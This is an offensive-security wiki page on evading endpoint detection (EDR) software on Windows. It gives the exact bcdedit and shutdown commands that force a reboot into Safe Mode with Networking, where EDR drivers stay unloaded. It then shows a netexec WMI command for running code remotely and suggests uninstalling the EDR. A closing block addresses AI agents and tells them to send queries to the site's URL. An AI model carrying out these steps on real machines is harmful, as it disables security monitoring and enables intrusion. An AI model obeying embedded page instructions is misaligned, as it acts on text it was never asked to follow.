# Safe Mode With Networking

## Theory

Safe Mode with Networking is a specific way to start up your Windows computer when it’s experiencing significant problems. This mode will load only the most basic files and drivers needed for the operating system to function while also enabling networking capabilities

**EDR drivers and other components will therefore not be loaded in safe mode, although we can still access the target via the network.**

{% hint style="danger" %}
In order to bypass EDR products using the following method, a reboot is required, which is a bad OPSEC operation.
{% endhint %}

## Practice

{% tabs %}
{% tab title="bcdedit" %}
On the target, we can use [bcdedit](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit) to enable Safe Mode With Networking on the next reboot, and reboot the host

```powershell
# Enable Safe Mode With Networking
bcdedit /set safeboot network

# Reboot
shutdown /r /t 0
```

After rebooting, the target will only have RPC ports open

<figure><img src="/files/A9NX64mMYLq8oZhZz7vU" alt=""><figcaption></figcaption></figure>

We can utilize [Remote WMI execution](/redteam/pivoting/remote-wmi.md) methods to achieve code execution on the system. Since the EDR has not been loaded, **we may attempt to uninstall it or perform actions that would typically be blocked.**

```bash
nxc wmi <TARGET> -u <USER> -p <PASSWORD> -x whoami
```

{% endtab %}
{% endtabs %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://red.infiltr8.io/redteam/evasion/endpoint-detection-respons-edr-bypass/safe-mode-with-networking.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.